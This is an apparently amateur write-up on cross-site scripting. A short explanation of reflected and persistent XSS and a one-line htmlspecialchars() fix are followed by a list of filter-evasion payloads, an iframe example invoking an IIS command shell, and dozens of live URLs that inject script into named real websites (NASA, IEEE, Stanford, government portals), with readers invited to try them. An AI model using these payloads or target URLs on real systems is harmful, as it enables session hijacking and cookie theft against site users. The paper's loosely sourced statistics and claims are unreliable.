Cross site scripting (XSS) Research Paper By Aarshit Mittal and Harsha Vardhan Boppana
Cross site scripting is a web application based attack generally found in online services, pages of the websites the attack is a temporary attack but can be used by a black hat hacker or a financial cyber fraud for a permanent attack on user’s confidential data. Cross site scripting occurs when a web application gathers data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it. The user will most likely click on this link from another website, instant message, or simply just reading a web board or email message. Usually the attacker will encode the malicious portion of the link to the site in HEX (or other encoding methods) so the request is less suspicious looking to the user when clicked on. After the data is collected by the web application, it creates an output page for the user containing the malicious data that was originally sent to it, but in a manner to make it appear as valid content from the website. Many popular guestbook and forum programs allow users to submit posts with html and JavaScript embedded in them. If for example I was logged in as “john” and read a message by “joe” that contained malicious JavaScript in it, then it may be possible for “joe” to hijack my session just by reading his bulletin board post. Further details on how attacks like this are accomplished via “cookie theft” are explained in detail below.
The attack vulnerability is found in 82% of web applications as shown by SYMANTEC 2007 research on XSS
What is actually XSS attack??
The attack is a script injecting attack to a low secured page mainly a site search pages.
Often attackers will inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool a user in order to gather data from them. Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible.
New malicious uses are being found every day for XSS attacks.
IEEE, NASA, GOOGLE, FACEBOOK, MICROSOFT, YAHOO ALL ARE VULNERABLE TO THE ATTACK
There are mainly two kinds of XSS attacks
1. Non persistent
(Reflective and No reflective)
The type of this attack is carried out by injecting some client side scripts to a vulnerable link which further can be used by a black hat to steal confidential data of a particular user by letting the user to click on that injected link by means of some social engineering.
The vulnerability was found by us in IEEE, NASA, FACEBOOK, MSN, PAYPAL
XSS CODE FOR ERROR DISPLAY INJECT This –>
‘”–></style></script><script>alert(“XSS”)</script>
‘;alert(String.fromCharCode(88,83,83))//\'”;alert(String.fromCharCode(88,83,83))//\”<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
‘%3Balert(String.fromCharCode(88,83,83))%3B/*
<script+language%3D’javascript’>alert(document.cookie)<%2Fscript>&type=all
<script+language%3D’javascript’>alert(document.cookie)<%2Fscript>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
“><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
“><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>&page=search
“>”><%2Fscript><script>alert(String.fromCharCode(88,83,83))%3B<%2Fscript>
‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”<‘><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
“><iframe+onload%3Dalert(%2FXSS%2F)>
-%3E%3Cscript%3Ealert%28XSS%29%3C/script%3E.html
2. Persistent
This type is the most dangerous attack as the injected code is now saved in the server and is shown on the normal pages, which further lt many users to be a victim of a cyber fraud loosing the crucial data this vulnerability was found by me in yahoo and now it is patched
How about using XSS to exploit vulnerabilities in web sites, with some
Degree of anonyminity
Example:
hello.asp takes 1 parameter (name) that is displayed to the screen with no Cleansing.
/hello.asp?name = <iframe
src=http://vuln.iis.server/scripts/root.exe?/c+dir></iframe>
I used iframe in the example as it shows something visible on the screen. But an attacker would need no response from the server so image tags etc are all viable. Web board has XSS and also runs vuln iis. Attacker posts message with xss exploit that hack the server. User comes along reads message and user’s ip gets logged as making his account a complete victim of an account loss. This could even be set to hack a different iis server.
How about other exploits?
Custom made .ida overflow code
<iframe src=http://vuln.iis.server/a.ida?XXX….XXX{CUSTOM IDA OVERFLOW
CODE}></iframe>
The vulnerability is although easy to patch,
Let the link is :
Site.com/path/xss.php?data=<script>alert(“XSS”);</script>
Now we can patch it:
PHP Provides a function called htmlspecialchars() which converts the chars into their HTML entities. Now we’ll just use this in the above code and check what happens.
Xss.php (line number 33)
Code: php
echo htmlspecialchars(“<i>$data</i>”);
LIVE EXAMPLES OF THE VULNERABILITY:
THE VULNERABILITY WORKS WITH MOZILLA OR INTERNET EXPLORER
TRY THE ERRORS LIVE ON LISTED SITES EXPLOITED BY US 😀
http://ieeexplore.ieee.org/search/searchresult.jsp?reload=true&newsearch=true&queryText=’;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”<‘><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
This FACEBOOK XSS is patched now but error today also occurs in IE (FB dnt acknowlege for this error they patch it)
http://www.facebook.com/messages/?action=read&tid%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5c%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%20%3E%20%3E
http://money.cnn.com/search/index.html?sortBy=date&primaryType=mixed&source=money&query=%22%3E%3Ciframe+onload%3Dalert%28%2FXSS%2F%29%3E
http://svs.gsfc.nasa.gov/cgi-bin/advsearch.cgi?query=moon&req=search&year=%27%22–%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E&movie_type=All&movie_size=Any&image_type=All&image_size=Any
http://ibnlive.in.com/videos/video_test_new.php?section=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.hpc.lsu.edu/systems/system.php?system=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.careersingear.com/search?q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.honda.co.uk/search/?q=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E=&{}
http://www.nimbuzz.com/webchat_login?lang=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://pfn.sourceforge.net/index.php?opc=2%22%3E%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.porn8.com/search_result.php?search_id=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://blogs.news.com.au/technology/blog/index.php/?moo%3Cscript%3Ealert%28%27XSS%20Arrives%27%29;%3C/script%3E;%27
http://english.stanford.edu/graduate.php?type=placement&order_by=year_appointed&order=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://antares.stanford.edu/index.php/Site/Search?pagename=Site/Search&q=%22%20style=%27position:absolute;left:0;top:0;width:100%;height:100%;z-index:9999%27%20onmousemove=%27alert(21);
http://id.post.yahoo.com/search/searchForum/p/%2526amp%253Bamp%253Bquot%253B%2526amp%253Bamp%253B%252362%253B%2B%2B%2526amp%253Bamp%253B%252339%253B%2526amp%253Bamp%253B%252339%253B%253B%2521–%2526amp%253Bamp%253Bquot%253B%2B%2B%2526amp%253Bamp%253B%252339%253B%253Balert%2528String.FromCharCode%252888%252C83%252C83%2529%2529%252F%252F%2526amp%253Bamp%253B%252392%253B%2526amp%253Bamp%253B%252339%253B%253Balert%2528String.FromCharCode%252888%252C83%252C83%2529%2529%252F%252F%2526amp%253Bamp%253Bquot%253B%253Balert%2528String.FromCharCode%252888%252C83%252C83%2529%2529%252F%252F%2526amp%253Bamp%253B%252392%253B%2526amp%253Bamp%253Bquot%253B%253Balert%2528String.FromCharCode%252888%252C83%252C83%2529%2529%252F%252F–%2526amp%253Bamp%253B%252362%253B%2B%2526amp%253Bamp%253Bquot%253B%2526amp%253Bamp%253B%252362%253B%2526amp%253Bamp%253B%252339%253B%2526amp%253Bamp%253B%252362%253B%2B%2BXss%2Bby%2B%257E%2521White%2521%257E%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2526amp%253Bamp%253B%25238221%253B%2526amp%253Bamp%253B%252362%253B%2B%2B%2BGo%2BOver%2BMe/noRedirect/1 (PATCHED NOW)
http://docs.ma3hd.net/search.php?search=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://money.cnn.com/search/index.html?sortBy=date&primaryType=mixed&source=money&query=%22%3E%3Ciframe+onload%3Dalert%28%2FXSS%2F%29%3E
http://www.brita.net/pt/product_search.html?tx_indexedsearch%5Bsword%5D=%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E&tx_indexedsearch%5B_sections%5D=0&tx_indexedsearch%5Bpointer%5D=0&tx_indexedsearch%5Bext%5D=0&tx_indexedsearch%5Blang%5D=0&tx_indexedsearch%5Bsubmit_button%5D=+&L=8&selection=product_search.html%3FL%3D8
http://tsastatus.net/search.php?q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.the-west.net/?ref=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.pridefc.com/pride2005/index.php?mainpage=fighters_list&action=search&s_name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%3E%3C%2FSCRIPT%3E–!%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E
http://watsagri.nstl.gov.cn/SPT–QuickSearch.php?F_SearchString=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.mangoblog.org/generic.cfm?q=%3Cscript%3Ealert%28%27Namaste+by+Aarshit%27%29%3C%2Fscript%3E&event=googlesearch-search
www.callcongressnow.com/index.cfm?action=<script>alert(21)</script>
http://www.hotelplanner.com/FeaturedHotel.cfm?hid=92988&redirect=http%3A%2F%2Fwww.zplanet.in
http://www.the-west.net/?ref=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://tsastatus.net/search.php?q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://mpr.go.id/search?searchtext=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://shopping.rediff.com/product/%22%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
https://www.elance.com/r/contractors/q-%26quot%3B%26gt%3B%26lt%3Bimg%20src%3Dpp%20onerror%3D%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%26gt%3B
http://www.md5center.com/md5-reverse-index.php?start=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.naaptol.com/web/profile/WO-users-W1093037O/-%3E%3Cscript%3Ealert%28XSS%29%3C/script%3E.html
http://www.internetdj.com/search.php?query=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://fesmekan.mynet.com/istanbul/mekanlar/?q=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.yuniti.com/index.php?a=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.mtv.com/sitewide/utils/gamespot/gs_scripts.jhtml?gamespotURL=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://reg.email.163.com/mailregAll/checkreg.do?username=yes&domain=163.com&sid=lCLGlQWaIQwqPYAODAaaBLsMFDjOKwOW&uid=yes%40163.com&host=webmail.mail.163.com&ver=js4&callback=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
http://sod-premium.com/ppv/content/detail.php?adv=ZZZ%3E%3CSCRIPT%3Ealert%28document.cookie%29;%3C/SCRIPT%3E%3E%3CSCRIPT%3Ealert%28document.cookie%29;%3C/SCRIPT%3E&mid=6321
http://www.indiamp3.com/music/index.php?term=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C%2Fscript%3E&in=song&action=search&start=0
http://myesia.com/esiaold.php?id=1&page=%22/%3E%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29;%3C/script%3E
http://customize.org/members?name=%3C/title%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.w3.org/services/html2txt?url=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.blender3d.org/e-shop/product_info.php?products_id=97%22%3E%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.fededirectory.frb.org/search_ach.cfm?&name=asd?s=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&state=CA&city=BONN&aba=23
http://www.mp3muzika.org/search.php?search=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.electionguide.org/advanced-search.php?region=&country=&type=&round_num=0&start_month=01&start_year=2009&end_month=12&end_year=2009&submitted=1&submit.x=0&submit.y=0&submit=Search&keyword=&party_leader=&cs_keyword=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.alpeadria.org/english/index.php?page=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://onebigtorrent.org/index.php?cat=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.bugday.org/cat.php?cID=19%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.airluxe.co.uk/catalogue/products.asp?s=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://printablecolouringpages.co.uk/?s=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.super-buys.co.uk/search.php?keyword=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.disclosurescotland.co.uk/search/index.jsp?qt=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.performancecentre.co.uk/p/error.asp?ErrorMsg=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
https://www.askthe.police.uk/regions/town.mth?town=%22%3E%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3B%3C%2Fscript%3E
http://www.dk.co.uk/nf/Search/QuickSearchProc/1,,,00.html?strSearch=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://img6.imageshack.us/slideshow/webplayer.php?id=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://img1.imageshack.us/slideshow/webplayer.php?id=image.jpg%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://quickpic.us/search/?SectionIDOverride=1&SearchText=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.charities.ago.state.ma.us/charities/index.asp?charities_app_ctx=error&charities_sub_ctx=entry&error_flag=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://keygen.us/search.shtml?w=cracks&q=auth/ldap/authldap.php?includepath=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://paracoloreardibujo.s-pl.us/search.php?sbox=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.cne.gov.co/CNE/index.jsp?option=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.stc.appspot.com/compare/utah.gov/youngcart4/bbs//delete_comment.php%20.gov%20php&sa=X%3E%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E/
http://www.dcz.gov.ua/control/uk/search/meta/results?search_param=&simplesearch=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.parnamirim.rn.gov.br/busca?q=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://help.meta.ua/index.php?mode=search&q=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://md.mirkvartir.ua/cms/%27%3Balert%28String.fromCharCode%2888,83,83%29%29%3B/*
http://map.meta.ua/?map=%22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://lib.meta.ua/?letter=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.novostimira.com.ua/search.php?f_words=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://search.ua/viewytv.php?url=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://search.ua/viewytv.php?type=”><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
http://tv.meta.ua/index.php?q=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&page=search
http://prp.org.ua/index.php?mid=10&action=news_full&search_item=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.vab.ua/rus/search/?search=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.entel.kiev.ua/ru/searchrez.php?search=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://personas.media.mit.edu/getSnippets?name=aa%3Cscript%3Ealert%28document.cookie%29%3C/script%3Eaa&lang=
http://www.andrew.cmu.edu/cgi-bin/search?name=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3B%3C/script%3E&type=2
http://acme.able.cs.cmu.edu/pubs/show.php?type=html&ord=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://discovery.library.colostate.edu/Search/Home?lookfor=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://mcckc.edu/searchResults.asp?cx=015941728899689753552%3Amvkfqavgtf4&ie=UTF-8&cof=FORID%3A11&q=%3E%3C%2Ftitle%3E%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%3C!&sa.x=0&sa.y=0
http://www.econ.upf.edu/en/people/onefaculty.php?id=p3759%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://pus.lcs.mit.edu/cgi-bin/scigen.cgi?author=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://mayors24.boston.gov/Ef3/Error.jsp?reason=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://svs.gsfc.nasa.gov/cgi-bin/advsearch.cgi?query=moon&req=search&year=%27%22–%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E&movie_type=All&movie_size=Any&image_type=All&image_size=Any
http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO2&Sect2=HITOFF&u=%2Fnetahtml%2FPTO%2Fsearch-adv.htm&r=0&p=1&f=S&l=50&Query=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&d=PTXT
http://www.ourdocuments.gov/content.php?flash=true&page=%22%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E
MANY CONFIDENTIAL SITES XSS ARE NOT EXPOSED BUT CAN BE FOUND HERE –>
http://www.facebook.com/media/set/?set=a.224850657641509.49377.100003497297964&type=3&l=8d8755e93a
Read more: Cross site scripting (XSS) Research Paper By Aarshit Mittal and Harsha Vardhan Boppana
Incoming search terms